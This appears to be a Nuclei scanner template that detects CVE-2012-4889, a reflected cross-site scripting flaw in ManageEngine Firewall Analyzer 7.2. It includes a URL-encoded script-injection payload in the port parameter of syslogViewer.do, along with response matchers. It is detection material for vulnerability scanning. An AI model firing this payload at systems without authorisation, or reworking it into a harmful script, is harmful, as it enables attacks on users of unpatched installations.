id: CVE-2012-4889 info: name: ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do. reference: - http://web.archive.org/web/20210121082432/https://www.securityfocus.com/bid/52841/info - https://nvd.nist.gov/vuln/detail/CVE-2012-4889 - http://packetstormsecurity.org/files/111474/VL-437.txt - http://www.vulnerability-lab.com/get_content.php?id=437 classification: cve-id: CVE-2012-4889 tags: cve,cve2012,xss,manageengine,packetstorm requests: - method: GET path: - "{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - '' part: body - type: word part: header words: - text/html - type: status status: - 200 # Enhanced by mp on 2022/02/21